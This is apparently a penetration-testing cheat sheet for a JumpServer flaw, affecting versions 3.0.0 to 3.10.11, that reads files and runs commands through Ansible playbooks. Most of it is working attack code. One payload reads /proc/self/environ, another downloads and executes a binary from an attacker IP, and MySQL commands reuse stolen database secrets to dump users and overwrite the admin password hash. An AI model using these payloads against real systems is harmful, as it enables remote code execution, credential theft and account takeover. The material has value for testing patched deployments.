##########
JumpServer
##########

*********
File Read
*********

| Tested on v3.10.11
| Affected versions : v3.0.0-v3.10.11
| Patched versions : v3.10.12, v4.0.0
| https://github.com/jumpserver/jumpserver/security/advisories/GHSA-rpf7-g4xh-84v9

| Check

.. code-block:: yaml

    - hosts: all
      tasks:
      - name: read file from local host = celery using file lookup plugin
        ansible.builtin.debug:
          msg: "{{ lookup('ansible.builtin.file', '/proc/self/environ') }}"

|

| Test CMD

.. code-block:: yaml

    - hosts: all
      tasks:
      - name: test cmd
        ansible.builtin.debug:
          msg: "{{ lookup('ansible.builtin.pipe', 'cat /proc/self/environ') }}"

|

| Download payload and exec

.. code-block:: yaml

    - hosts: all
      tasks:
      - name: test1
        ansible.builtin.debug:
          msg: "{{ lookup('ansible.builtin.pipe', 'curl 10.10.14.4/r -o /root/r2') }}"
      - name: test2
        ansible.builtin.debug:
          msg: "{{ lookup('ansible.builtin.pipe', 'chmod 755 /root/r2') }}"
      - name: test3
        ansible.builtin.debug:
          msg: "{{ lookup('ansible.builtin.pipe', '/root/r2') }}"

|

| Use secrets from environ to connect to DB 

.. code-block:: bash

    mysql -h mysql -p3306 -u root -D jumpserver --password=dbpassword -e 'select * from users_user'

|

| You can copy hash value from any known account's password to replace admin password

.. code-block:: bash

    mysql -h mysql -p3306 -u root -D jumpserver --password=dbpassword -e 'UPDATE users_user SET password = "pbkdf2_sha256$390000$TltoINcfA78tfTsXiCKQK1$gP4SXdOchHuoUYzjojpZd55qKZj3HC2o9+r9iSCdg40=" WHERE id = "261c1b7af01a41d6b1845dd19478951b"'

| In order to reveal secrets from admin interface you will need to setup MFA using an authentificator app (like keepass or google authentificator)